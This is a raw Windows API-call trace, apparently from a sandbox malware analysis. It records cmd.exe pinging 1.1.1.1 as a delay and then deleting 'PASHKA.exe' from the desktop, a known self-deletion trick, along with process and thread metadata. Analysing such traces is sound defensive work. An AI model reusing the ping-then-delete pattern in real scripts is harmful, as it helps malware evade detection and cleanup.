fInfoLevelId=0x1, lpFindFileData=0x6ff108, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x6ff108) returned 0x767ff8 [0045.117] GetProcessHeap () returned 0x760000 [0045.117] RtlAllocateHeap (HeapHandle=0x760000, Flags=0x0, Size=0x14) returned 0x768038 [0045.117] FindClose (in: hFindFile=0x767ff8 | out: hFindFile=0x767ff8) returned 1 [0045.117] FindFirstFileExW (in: lpFileName="C:\\WINDOWS\\system32\\PING.COM", fInfoLevelId=0x1, lpFindFileData=0x6ff108, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x6ff108) returned 0xffffffff [0045.117] GetLastError () returned 0x2 [0045.117] FindFirstFileExW (in: lpFileName="C:\\WINDOWS\\system32\\PING.EXE", fInfoLevelId=0x1, lpFindFileData=0x6ff108, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x6ff108) returned 0x767ff8 [0045.117] GetProcessHeap () returned 0x760000 [0045.117] RtlReAllocateHeap (Heap=0x760000, Flags=0x0, Ptr=0x768038, Size=0x4) returned 0x768038 [0045.117] FindClose (in: hFindFile=0x767ff8 | out: hFindFile=0x767ff8) returned 1 [0045.117] _wcsicmp (_String1=".EXE", _String2=".BAT") returned 3 [0045.117] _wcsicmp (_String1=".EXE", _String2=".CMD") returned 2 [0045.117] ??_V@YAXPAX@Z () returned 0x1 [0045.117] GetConsoleTitleW (in: lpConsoleTitle=0x6ff60c, nSize=0x104 | out: lpConsoleTitle="C:\\WINDOWS\\SYSTEM32\\cmd.exe") returned 0x1c [0045.138] InitializeProcThreadAttributeList (in: lpAttributeList=0x6ff538, dwAttributeCount=0x1, dwFlags=0x0, lpSize=0x6ff524 | out: lpAttributeList=0x6ff538, lpSize=0x6ff524) returned 1 [0045.138] UpdateProcThreadAttribute (in: lpAttributeList=0x6ff538, dwFlags=0x0, Attribute=0x60001, lpValue=0x6ff520, cbSize=0x4, lpPreviousValue=0x0, lpReturnSize=0x0 | out: lpAttributeList=0x6ff538, lpPreviousValue=0x0) returned 1 [0045.138] GetStartupInfoW (in: lpStartupInfo=0x6ff570 | out: lpStartupInfo=0x6ff570*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\WINDOWS\\SYSTEM32\\cmd.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0)) [0045.138] GetProcessHeap () returned 0x760000 [0045.138] RtlAllocateHeap (HeapHandle=0x760000, Flags=0x8, Size=0x18) returned 0x767ff8 [0045.139] _wcsnicmp (_String1="COPYCMD", _String2="=C:=C:\\", _MaxCount=0x7) returned 38 [0045.139] _wcsnicmp (_String1="COPYCMD", _String2="ALLUSER", _MaxCount=0x7) returned 2 [0045.139] _wcsnicmp (_String1="COPYCMD", _String2="APPDATA", _MaxCount=0x7) returned 2 [0045.139] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0045.139] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0045.139] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0045.139] _wcsnicmp (_String1="COPYCMD", _String2="COMPUTE", _MaxCount=0x7) returned 3 [0045.139] _wcsnicmp (_String1="COPYCMD", _String2="ComSpec", _MaxCount=0x7) returned 3 [0045.139] _wcsnicmp (_String1="COPYCMD", _String2="HOMEDRI", _MaxCount=0x7) returned -5 [0045.139] _wcsnicmp (_String1="COPYCMD", _String2="HOMEPAT", _MaxCount=0x7) returned -5 [0045.139] _wcsnicmp (_String1="COPYCMD", _String2="LOCALAP", _MaxCount=0x7) returned -9 [0045.139] _wcsnicmp (_String1="COPYCMD", _String2="LOGONSE", _MaxCount=0x7) returned -9 [0045.139] _wcsnicmp (_String1="COPYCMD", _String2="NUMBER_", _MaxCount=0x7) returned -11 [0045.139] _wcsnicmp (_String1="COPYCMD", _String2="OneDriv", _MaxCount=0x7) returned -12 [0045.139] _wcsnicmp (_String1="COPYCMD", _String2="OS=Wind", _MaxCount=0x7) returned -12 [0045.139] _wcsnicmp (_String1="COPYCMD", _String2="Path=C:", _MaxCount=0x7) returned -13 [0045.139] _wcsnicmp (_String1="COPYCMD", _String2="PATHEXT", _MaxCount=0x7) returned -13 [0045.139] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0045.139] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0045.139] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0045.139] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0045.139] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0045.139] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0045.139] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0045.139] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0045.139] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0045.139] _wcsnicmp (_String1="COPYCMD", _String2="PROMPT=", _MaxCount=0x7) returned -13 [0045.139] _wcsnicmp (_String1="COPYCMD", _String2="PSModul", _MaxCount=0x7) returned -13 [0045.139] _wcsnicmp (_String1="COPYCMD", _String2="PUBLIC=", _MaxCount=0x7) returned -13 [0045.139] _wcsnicmp (_String1="COPYCMD", _String2="SystemD", _MaxCount=0x7) returned -16 [0045.139] _wcsnicmp (_String1="COPYCMD", _String2="SystemR", _MaxCount=0x7) returned -16 [0045.139] _wcsnicmp (_String1="COPYCMD", _String2="TEMP=C:", _MaxCount=0x7) returned -17 [0045.139] _wcsnicmp (_String1="COPYCMD", _String2="TMP=C:\\", _MaxCount=0x7) returned -17 [0045.139] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18 [0045.139] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18 [0045.139] _wcsnicmp (_String1="COPYCMD", _String2="USERNAM", _MaxCount=0x7) returned -18 [0045.139] _wcsnicmp (_String1="COPYCMD", _String2="USERPRO", _MaxCount=0x7) returned -18 [0045.140] _wcsnicmp (_String1="COPYCMD", _String2="windir=", _MaxCount=0x7) returned -20 [0045.140] GetProcessHeap () returned 0x760000 [0045.140] RtlFreeHeap (HeapHandle=0x760000, Flags=0x0, BaseAddress=0x767ff8) returned 1 [0045.140] GetProcessHeap () returned 0x760000 [0045.140] RtlAllocateHeap (HeapHandle=0x760000, Flags=0x8, Size=0xa) returned 0x767ff8 [0045.140] lstrcmpW (lpString1="\\PING.EXE", lpString2="\\XCOPY.EXE") returned -1 [0045.141] _get_osfhandle (_FileHandle=1) returned 0x90 [0045.141] SetConsoleMode (hConsoleHandle=0x90, dwMode=0x3) returned 0 [0045.141] _get_osfhandle (_FileHandle=0) returned 0x8c [0045.141] SetConsoleMode (hConsoleHandle=0x8c, dwMode=0x1f7) returned 1 [0045.208] CreateProcessW (in: lpApplicationName="C:\\WINDOWS\\system32\\PING.EXE", lpCommandLine="ping 1.1.1.1 -n 1 -w 3000 ", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x80000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\FD1HVy\\Desktop", lpStartupInfo=0x6ff4c0*(cb=0x48, lpReserved=0x0, lpDesktop="WinSta0\\Default", lpTitle="ping 1.1.1.1 -n 1 -w 3000 ", dwX=0x0, dwY=0x1, dwXSize=0x64, dwYSize=0x64, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x6ff50c | out: lpCommandLine="ping 1.1.1.1 -n 1 -w 3000 ", lpProcessInformation=0x6ff50c*(hProcess=0xe4, hThread=0xe0, dwProcessId=0xfd4, dwThreadId=0xa90)) returned 1 [0045.349] CloseHandle (hObject=0xe0) returned 1 [0045.349] SetEnvironmentVariableW (lpName="COPYCMD", lpValue=0x0) returned 1 [0045.349] GetProcessHeap () returned 0x760000 [0045.349] RtlFreeHeap (HeapHandle=0x760000, Flags=0x0, BaseAddress=0x766c88) returned 1 [0045.349] GetEnvironmentStringsW () returned 0x766c88* [0045.350] GetProcessHeap () returned 0x760000 [0045.350] RtlAllocateHeap (HeapHandle=0x760000, Flags=0x8, Size=0xb1a) returned 0x77ace0 [0045.350] FreeEnvironmentStringsA (penv="=") returned 1 [0045.350] WaitForSingleObject (hHandle=0xe4, dwMilliseconds=0xffffffff) returned 0x0 [0047.668] GetExitCodeProcess (in: hProcess=0xe4, lpExitCode=0x6ff4a4 | out: lpExitCode=0x6ff4a4*=0x0) returned 1 [0047.668] CloseHandle (hObject=0xe4) returned 1 [0047.669] _vsnwprintf (in: _Buffer=0x6ff58c, _BufferCount=0x13, _Format="%08X", _ArgList=0x6ff4ac | out: _Buffer="00000000") returned 8 [0047.669] SetEnvironmentVariableW (lpName="=ExitCode", lpValue="00000000") returned 1 [0047.669] GetProcessHeap () returned 0x760000 [0047.669] RtlFreeHeap (HeapHandle=0x760000, Flags=0x0, BaseAddress=0x77ace0) returned 1 [0047.669] GetEnvironmentStringsW () returned 0x77c350* [0047.669] GetProcessHeap () returned 0x760000 [0047.669] RtlAllocateHeap (HeapHandle=0x760000, Flags=0x8, Size=0xb40) returned 0x77ce98 [0047.670] FreeEnvironmentStringsA (penv="=") returned 1 [0047.670] SetEnvironmentVariableW (lpName="=ExitCodeAscii", lpValue=0x0) returned 1 [0047.670] GetProcessHeap () returned 0x760000 [0047.670] RtlFreeHeap (HeapHandle=0x760000, Flags=0x0, BaseAddress=0x77ce98) returned 1 [0047.670] GetEnvironmentStringsW () returned 0x77c350* [0047.670] GetProcessHeap () returned 0x760000 [0047.670] RtlAllocateHeap (HeapHandle=0x760000, Flags=0x8, Size=0xb40) returned 0x77ce98 [0047.670] FreeEnvironmentStringsA (penv="=") returned 1 [0047.670] GetProcessHeap () returned 0x760000 [0047.670] RtlFreeHeap (HeapHandle=0x760000, Flags=0x0, BaseAddress=0x767ff8) returned 1 [0047.670] DeleteProcThreadAttributeList (in: lpAttributeList=0x6ff538 | out: lpAttributeList=0x6ff538) [0047.670] ??_V@YAXPAX@Z () returned 0x1 [0047.670] _dup2 (_FileHandleSrc=3, _FileHandleDst=1) returned 0 [0047.670] _close (_FileHandle=3) returned 0 [0047.670] GetConsoleTitleW (in: lpConsoleTitle=0x6ffa98, nSize=0x104 | out: lpConsoleTitle="C:\\WINDOWS\\SYSTEM32\\cmd.exe") returned 0x1c [0047.769] malloc (_Size=0xffce) returned 0xa42670 [0047.769] ??_V@YAXPAX@Z () returned 0x6ff824 [0047.770] malloc (_Size=0xffce) returned 0xa52648 [0047.770] ??_V@YAXPAX@Z () returned 0x6ff5dc [0047.780] _wcsicmp (_String1="Del", _String2="DIR") returned -4 [0047.780] _wcsicmp (_String1="Del", _String2="ERASE") returned -1 [0047.780] _wcsicmp (_String1="Del", _String2="DEL") returned 0 [0047.780] ??_V@YAXPAX@Z () returned 0x1 [0047.780] GetProcessHeap () returned 0x760000 [0047.780] RtlAllocateHeap (HeapHandle=0x760000, Flags=0x8, Size=0xb8) returned 0x765c10 [0047.781] GetProcessHeap () returned 0x760000 [0047.781] RtlReAllocateHeap (Heap=0x760000, Flags=0x0, Ptr=0x765c10, Size=0x64) returned 0x765c10 [0047.781] GetProcessHeap () returned 0x760000 [0047.781] RtlSizeHeap (HeapHandle=0x760000, Flags=0x0, MemoryPointer=0x765c10) returned 0x64 [0047.781] GetProcessHeap () returned 0x760000 [0047.781] RtlAllocateHeap (HeapHandle=0x760000, Flags=0x8, Size=0x68) returned 0x765c80 [0047.781] malloc (_Size=0xffce) returned 0xa52648 [0047.781] ??_V@YAXPAX@Z () returned 0x6ff56c [0047.781] GetProcessHeap () returned 0x760000 [0047.781] RtlAllocateHeap (HeapHandle=0x760000, Flags=0x8, Size=0xb8) returned 0x765cf0 [0047.781] GetProcessHeap () returned 0x760000 [0047.781] RtlReAllocateHeap (Heap=0x760000, Flags=0x0, Ptr=0x765cf0, Size=0x64) returned 0x765cf0 [0047.781] GetProcessHeap () returned 0x760000 [0047.781] RtlSizeHeap (HeapHandle=0x760000, Flags=0x0, MemoryPointer=0x765cf0) returned 0x64 [0047.781] GetProcessHeap () returned 0x760000 [0047.781] RtlAllocateHeap (HeapHandle=0x760000, Flags=0x8, Size=0x4e) returned 0x765d60 [0047.781] GetCurrentDirectoryW (in: nBufferLength=0x7fe7, lpBuffer=0xa52648 | out: lpBuffer="C:\\Users\\FD1HVy\\Desktop") returned 0x17 [0047.781] malloc (_Size=0xffd2) returned 0xa62620 [0047.782] ??_V@YAXPAX@Z () returned 0x6ff324 [0047.782] malloc (_Size=0xffd2) returned 0xa72600 [0047.782] ??_V@YAXPAX@Z () returned 0x6feeac [0047.783] malloc (_Size=0xffd2) returned 0xa825e0 [0047.783] ??_V@YAXPAX@Z () returned 0x6feeac [0047.783] GetProcessHeap () returned 0x760000 [0047.783] RtlAllocateHeap (HeapHandle=0x760000, Flags=0x8, Size=0x38) returned 0x768178 [0047.784] malloc (_Size=0xffce) returned 0xa925c0 [0047.784] ??_V@YAXPAX@Z () returned 0x6fe844 [0047.784] malloc (_Size=0xffce) returned 0xaa2598 [0047.784] ??_V@YAXPAX@Z () returned 0x6fe844 [0047.785] malloc (_Size=0xffce) returned 0xab2570 [0047.785] ??_V@YAXPAX@Z () returned 0x6fe5f4 [0047.786] GetCurrentDirectoryW (in: nBufferLength=0x7fe7, lpBuffer=0xab2570 | out: lpBuffer="C:\\Users\\FD1HVy\\Desktop") returned 0x17 [0047.786] ??_V@YAXPAX@Z () returned 0x1 [0047.786] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x0, nVolumeNameSize=0x0, lpVolumeSerialNumber=0x0, lpMaximumComponentLength=0x6fe884, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0xa925c0, nFileSystemNameSize=0x7fe7 | out: lpVolumeNameBuffer=0x0, lpVolumeSerialNumber=0x0, lpMaximumComponentLength=0x6fe884*=0xff, lpFileSystemFlags=0x0, lpFileSystemNameBuffer="NTFS") returned 1 [0047.788] _wcsicmp (_String1="NTFS", _String2="FAT") returned 8 [0047.788] ??_V@YAXPAX@Z () returned 0x6fe85c [0047.788] ??_V@YAXPAX@Z () returned 0x1 [0047.789] ??_V@YAXPAX@Z () returned 0x1 [0047.790] malloc (_Size=0xffce) returned 0xa925c0 [0047.790] ??_V@YAXPAX@Z () returned 0x6fec6c [0047.791] GetProcessHeap () returned 0x760000 [0047.791] RtlAllocateHeap (HeapHandle=0x760000, Flags=0x8, Size=0x2c) returned 0x765db8 [0047.791] GetProcessHeap () returned 0x760000 [0047.791] RtlAllocateHeap (HeapHandle=0x760000, Flags=0x8, Size=0x258) returned 0x765df0 [0047.791] _wcsicmp (_String1="PASHKA.exe", _String2=".") returned 66 [0047.791] _wcsicmp (_String1="PASHKA.exe", _String2="..") returned 66 [0047.791] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Desktop\\PASHKA.exe" (normalized: "c:\\users\\fd1hvy\\desktop\\pashka.exe")) returned 0x20 [0047.791] GetProcessHeap () returned 0x760000 [0047.791] RtlAllocateHeap (HeapHandle=0x760000, Flags=0x8, Size=0xffd6) returned 0x77d9e0 [0047.791] GetCurrentDirectoryW (in: nBufferLength=0x7fe7, lpBuffer=0x77d9e8 | out: lpBuffer="C:\\Users\\FD1HVy\\Desktop") returned 0x17 [0047.791] SetErrorMode (uMode=0x0) returned 0x0 [0047.791] SetErrorMode (uMode=0x1) returned 0x0 [0047.791] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop\\PASHKA.exe", nBufferLength=0x7fe7, lpBuffer=0xa925c0, lpFilePart=0x6fec8c | out: lpBuffer="C:\\Users\\FD1HVy\\Desktop\\PASHKA.exe", lpFilePart=0x6fec8c*="PASHKA.exe") returned 0x22 [0047.792] SetErrorMode (uMode=0x0) returned 0x1 [0047.792] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Desktop" (normalized: "c:\\users\\fd1hvy\\desktop")) returned 0x11 [0047.792] GetProcessHeap () returned 0x760000 [0047.792] RtlAllocateHeap (HeapHandle=0x760000, Flags=0x8, Size=0x258) returned 0x760ca0 [0047.792] _wcsicmp (_String1="PASHKA.exe", _String2=".") returned 66 [0047.792] _wcsicmp (_String1="PASHKA.exe", _String2="..") returned 66 [0047.792] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Desktop\\PASHKA.exe" (normalized: "c:\\users\\fd1hvy\\desktop\\pashka.exe")) returned 0x20 [0047.792] ??_V@YAXPAX@Z () returned 0x1 [0047.793] GetProcessHeap () returned 0x760000 [0047.793] RtlAllocateHeap (HeapHandle=0x760000, Flags=0x8, Size=0x1e) returned 0x760578 [0047.793] GetProcessHeap () returned 0x760000 [0047.793] RtlAllocateHeap (HeapHandle=0x760000, Flags=0x8, Size=0x38) returned 0x766050 [0047.793] GetProcessHeap () returned 0x760000 [0047.793] RtlAllocateHeap (HeapHandle=0x760000, Flags=0x8, Size=0x38) returned 0x766090 [0047.793] ??_V@YAXPAX@Z () returned 0x1 [0047.794] ??_V@YAXPAX@Z () returned 0x1 [0047.796] malloc (_Size=0xffd2) returned 0xa72600 [0047.797] ??_V@YAXPAX@Z () returned 0x6fefe4 [0047.797] GetProcessHeap () returned 0x760000 [0047.797] RtlAllocateHeap (HeapHandle=0x760000, Flags=0x8, Size=0x808) returned 0x77ace0 [0047.797] FindFirstFileExW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop\\PASHKA.exe", fInfoLevelId=0x0, lpFindFileData=0x77acec, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x77acec) returned 0x7660d0 [0047.798] malloc (_Size=0xffd2) returned 0xa825e0 [0047.798] ??_V@YAXPAX@Z () returned 0x6feb74 [0047.798] malloc (_Size=0xffd2) returned 0xa925c0 [0047.798] ??_V@YAXPAX@Z () returned 0x6feb74 [0047.798] RtlDosPathNameToRelativeNtPathName_U_WithStatus () returned 0x0 [0047.799] NtOpenFile (in: FileHandle=0x6feb9c, DesiredAccess=0x10000, ObjectAttributes=0x6feb64*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Users\\FD1HVy\\Desktop\\PASHKA.exe", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x6feb8c, ShareAccess=0x4, OpenOptions=0x5040 | out: FileHandle=0x6feb9c*=0xe4, IoStatusBlock=0x6feb8c*(Status=0x0, Pointer=0x0, Information=0x1)) returned 0x0 [0047.799] RtlReleaseRelativeName () returned 0x6feb7c [0047.799] RtlFreeAnsiString (AnsiString="\\") [0047.799] NtQueryVolumeInformationFile (in: FileHandle=0xe4, IoStatusBlock=0x6feac8, FsInformation=0x6fead0, Length=0x8, FsInformationClass=0x4 | out: IoStatusBlock=0x6feac8, FsInformation=0x6fead0) returned 0x0 [0047.799] CloseHandle (hObject=0xe4) returned 1 [0047.923] ??_V@YAXPAX@Z () returned 0x1 [0047.924] ??_V@YAXPAX@Z () returned 0x1 [0047.925] FindNextFileW (in: hFindFile=0x7660d0, lpFindFileData=0x77acec | out: lpFindFileData=0x77acec*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe2e35c00, ftCreationTime.dwHighDateTime=0x1d5c6bc, ftLastAccessTime.dwLowDateTime=0xe2e35c00, ftLastAccessTime.dwHighDateTime=0x1d5c6bc, ftLastWriteTime.dwLowDateTime=0xe1b22f00, ftLastWriteTime.dwHighDateTime=0x1d5c6bc, nFileSizeHigh=0x0, nFileSizeLow=0x12200, dwReserved0=0x0, dwReserved1=0x0, cFileName="PASHKA.exe", cAlternateFileName="")) returned 0 [0047.926] GetLastError () returned 0x12 [0047.926] FindClose (in: hFindFile=0x7660d0 | out: hFindFile=0x7660d0) returned 1 [0047.926] ??_V@YAXPAX@Z () returned 0x1 [0047.928] GetProcessHeap () returned 0x760000 [0047.928] RtlFreeHeap (HeapHandle=0x760000, Flags=0x0, BaseAddress=0x77ace0) returned 1 [0047.928] GetProcessHeap () returned 0x760000 [0047.928] RtlFreeHeap (HeapHandle=0x760000, Flags=0x0, BaseAddress=0x766090) returned 1 [0047.928] GetProcessHeap () returned 0x760000 [0047.928] RtlFreeHeap (HeapHandle=0x760000, Flags=0x0, BaseAddress=0x760578) returned 1 [0047.928] GetProcessHeap () returned 0x760000 [0047.928] RtlFreeHeap (HeapHandle=0x760000, Flags=0x0, BaseAddress=0x766050) returned 1 [0047.928] ??_V@YAXPAX@Z () returned 0x1 [0047.930] GetProcessHeap () returned 0x760000 [0047.930] RtlFreeHeap (HeapHandle=0x760000, Flags=0x0, BaseAddress=0x760ca0) returned 1 [0047.930] GetProcessHeap () returned 0x760000 [0047.930] RtlFreeHeap (HeapHandle=0x760000, Flags=0x0, BaseAddress=0x77d9e0) returned 1 [0047.930] GetProcessHeap () returned 0x760000 [0047.930] RtlFreeHeap (HeapHandle=0x760000, Flags=0x0, BaseAddress=0x765df0) returned 1 [0047.930] GetProcessHeap () returned 0x760000 [0047.931] RtlFreeHeap (HeapHandle=0x760000, Flags=0x0, BaseAddress=0x765db8) returned 1 [0047.931] GetProcessHeap () returned 0x760000 [0047.931] RtlFreeHeap (HeapHandle=0x760000, Flags=0x0, BaseAddress=0x768178) returned 1 [0047.931] GetProcessHeap () returned 0x760000 [0047.931] RtlFreeHeap (HeapHandle=0x760000, Flags=0x0, BaseAddress=0x765d60) returned 1 [0047.931] GetProcessHeap () returned 0x760000 [0047.931] RtlFreeHeap (HeapHandle=0x760000, Flags=0x0, BaseAddress=0x765cf0) returned 1 [0047.931] ??_V@YAXPAX@Z () returned 0x1 [0047.932] ??_V@YAXPAX@Z () returned 0x1 [0047.934] _get_osfhandle (_FileHandle=1) returned 0x90 [0047.934] SetConsoleMode (hConsoleHandle=0x90, dwMode=0x3) returned 1 [0048.103] _get_osfhandle (_FileHandle=1) returned 0x90 [0048.103] GetConsoleMode (in: hConsoleHandle=0x90, lpMode=0xd63890 | out: lpMode=0xd63890) returned 1 [0048.331] _get_osfhandle (_FileHandle=1) returned 0x90 [0048.331] SetConsoleMode (hConsoleHandle=0x90, dwMode=0x7) returned 1 [0048.398] _get_osfhandle (_FileHandle=0) returned 0x8c [0048.398] GetConsoleMode (in: hConsoleHandle=0x8c, lpMode=0xd63894 | out: lpMode=0xd63894) returned 1 [0048.493] _get_osfhandle (_FileHandle=0) returned 0x8c [0048.493] SetConsoleMode (hConsoleHandle=0x8c, dwMode=0x1e7) returned 1 [0048.591] SetConsoleInputExeNameW () returned 0x1 [0048.591] GetConsoleOutputCP () returned 0x1b5 [0048.676] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0xd63850 | out: lpCPInfo=0xd63850) returned 1 [0048.676] SetThreadUILanguage (LangId=0x0) returned 0x530409 [0048.717] exit (_Code=0) [0048.717] ??_V@YAXPAX@Z () returned 0x1 Thread: id = 9 os_tid = 0xf60 Process: id = "4" image_name = "conhost.exe" filename = "c:\\windows\\system32\\conhost.exe" page_root = "0x1394f000" os_pid = "0xa1c" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "3" os_parent_pid = "0xd3c" cmd_line = "\\??\\C:\\WINDOWS\\system32\\conhost.exe 0xffffffff -ForceV1" cur_dir = "C:\\WINDOWS" os_username = "NQDPDE\\FD1HVy" bitness = "32" os_groups = "NQDPDE\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000faa5" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 6 os_tid = 0xf4c Thread: id = 7 os_tid = 0x8a0 Thread: id = 8 os_tid = 0xe04 Process: id = "5" image_name = "ping.exe" filename = "c:\\windows\\syswow64\\ping.exe" page_root = "0x7b184000" os_pid = "0xfd4" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "3" os_parent_pid = "0xd3c" cmd_line = "ping 1.1.1.1 -n 1 -w 3000 " cur_dir = "C:\\Users\\FD1HVy\\Desktop\\" os_username = "NQDPDE\\FD1HVy" bitness = "32" os_groups = "NQDPDE\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000faa5" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 12 os_tid = 0xa90 [0046.079] GetModuleHandleA (lpModuleName=0x0) returned 0x3f0000 [0046.079] __set_app_type (_Type=0x1) [0046.079] __p__fmode () returned 0x76953c14 [0046.079] __p__commode () returned 0x769549ec [0046.079] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x3f3540) returned 0x0 [0046.079] __wgetmainargs (in: _Argc=0x3f40c8, _Argv=0x3f40cc, _Env=0x3f40d0, _DoWildCard=0, _StartInfo=0x3f40dc | out: _Argc=0x3f40c8, _Argv=0x3f40cc, _Env=0x3f40d0) returned 0 [0046.080] SetThreadUILanguage (LangId=0x0) returned 0x2aa0409 [0046.239] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0046.239] __iob_func () returned 0x76952608 [0046.239] _fileno (_File=0x76952628) returned 1 [0046.239] _get_osfhandle (_FileHandle=1) returned 0x90 [0046.240] GetFileType (hFile=0x90) returned 0x2 [0046.240] GetConsoleMode (in: hConsoleHandle=0x90, lpMode=0x292f52c | out: lpMode=0x292f52c) returned 0 [0046.240] GetLastError () returned 0x6 [0046.240] GetEnvironmentVariableW (in: lpName="OutputEncoding", lpBuffer=0x292f48c, nSize=0x50 | out: lpBuffer="") returned 0x0 [0046.240] WSAStartup (in: wVersionRequired=0x2, lpWSAData=0x3f54e0 | out: lpWSAData=0x3f54e0) returned 0 [0046.244] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SYSTEM\\CurrentControlSet\\Services\\Tcpip\\Parameters", ulOptions=0x0, samDesired=0x1, phkResult=0x292f544 | out: phkResult=0x292f544*=0x100) returned 0x0 [0046.245] RegQueryValueExW (in: hKey=0x100, lpValueName="DefaultTTL", lpReserved=0x0, lpType=0x292f538, lpData=0x292f540, lpcbData=0x292f53c*=0x4 | out: lpType=0x292f538*=0x0, lpData=0x292f540*=0x0, lpcbData=0x292f53c*=0x4) returned 0x2 [0046.245] RegCloseKey (hKey=0x100) returned 0x0 [0046.245] GetAddrInfoW (in: pNodeName="1.1.1.1", pServiceName=0x0, pHints=0x292f504*(ai_flags=4, ai_family=0, ai_socktype=0, ai_protocol=0, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x292f52c | out: ppResult=0x292f52c*=0x2d7d720*(ai_flags=4, ai_family=2, ai_socktype=0, ai_protocol=0, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x2d73ce8*(sa_family=2, sin_port=0x0, sin_addr="1.1.1.1"), ai_next=0x0)) returned 0 [0046.245] FreeAddrInfoW (pAddrInfo=0x2d7d720*(ai_flags=4, ai_family=2, ai_socktype=0, ai_protocol=0, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x2d73ce8*(sa_family=2, sin_port=0x0, sin_addr="1.1.1.1"), ai_next=0x0)) [0046.246] IcmpCreateFile () returned 0x2d740a0 [0046.686] LocalAlloc (uFlags=0x0, uBytes=0x20) returned 0x2d7d658 [0046.686] LocalAlloc (uFlags=0x0, uBytes=0x1ff8) returned 0x2d85c70 [0046.689] GetNameInfoW (in: pSockaddr=0x3f5440*(sa_family=2, sin_port=0x0, sin_addr="1.1.1.1"), SockaddrLength=0x10, pNodeBuffer=0x292f638, NodeBufferSize=0x41, pServiceBuffer=0x0, ServiceBufferSize=0x0, Flags=2 | out: pNodeBuffer="1.1.1.1", pServiceBuffer=0x0) returned 0 [0047.122] __iob_func () returned 0x76952608 [0047.122] FormatMessageW (in: dwFlags=0x900, lpSource=0x0, dwMessageId=0x274b, dwLanguageId=0x0, lpBuffer=0x292f538, nSize=0x0, Arguments=0x292f534 | out: lpBuffer="ꅰ˘$ʒ⟝?☨皕❋") returned 0x12 [0047.126] fflush (in: _File=0x76952628 | out: _File=0x76952628) returned 0 [0047.126] 